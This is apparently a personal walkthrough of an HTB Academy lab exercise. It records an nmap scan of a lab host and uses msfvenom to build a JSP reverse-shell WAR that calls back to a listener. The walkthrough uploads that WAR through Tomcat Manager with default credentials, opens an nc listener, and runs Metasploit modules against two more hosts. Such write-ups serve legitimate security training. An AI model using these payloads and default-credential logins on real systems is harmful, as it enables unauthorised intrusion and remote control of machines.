The Live Engagement
April 30, 2024
First we have to login into the ip that was given
RDP to 10.129.86.5 with user "htb-student" and password "HTB_@cademy_stdnt!"
First we have to nmap scan the first host which is the 172.16.1.11
# Nmap 7.92 scan initiated Tue Apr 30 02:56:03 2024 as: nmap -sC -sV -oN firsthost.nmap 172.16.1.11
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.026s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Inlanefreight Server Status
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
515/tcp open printer Microsoft lpd
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=shells-winsvr
| Not valid before: 2024-04-29T06:08:54
|_Not valid after: 2024-10-29T06:08:54
|_ssl-date: 2024-04-30T06:57:03+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: SHELLS-WINSVR
| NetBIOS_Domain_Name: SHELLS-WINSVR
| NetBIOS_Computer_Name: SHELLS-WINSVR
| DNS_Domain_Name: shells-winsvr
| DNS_Computer_Name: shells-winsvr
| Product_Version: 10.0.17763
|_ System_Time: 2024-04-30T06:56:57+00:00
8080/tcp open http Apache Tomcat 10.0.11
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/10.0.11
|_http-favicon: Apache Tomcat
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: shells-winsvr
| NetBIOS computer name: SHELLS-WINSVR\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-04-29T23:56:57-07:00
| smb2-time:
| date: 2024-04-30T06:56:57
|_ start_date: N/A
|_clock-skew: mean: 1h23m59s, deviation: 3h07m49s, median: -1s
|_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:17:44 (VMware)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 30 02:57:03 2024 -- 1 IP address (1 host up) scanned in 59.90 secondsThen we will seach for exploit for the web server tomcat
But it failed
It tried both the IP but still failed
Then we are going to change the payload for the exploit
msfvenom -l payloads | grep java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9001 -f war -o shell.war
Click the Manager App
User - tomcat
Pass - Tomcatadm
Upload a war file
After several to upload the war reverse shell it became successful
Set up a listener and go access the shell
nc -lnvp 9001
Second host - 172.16.1.12 or blog.inlanefrieght.local
Use reload_all to refresh the modules in msfconsole
reload_all
run
shell
cat /customscripts/flag.txt
Third host - 172.16.1.13
use 1
options
set rhost 172.16.1.13
set lhost 172.16.1.5
run
Last updated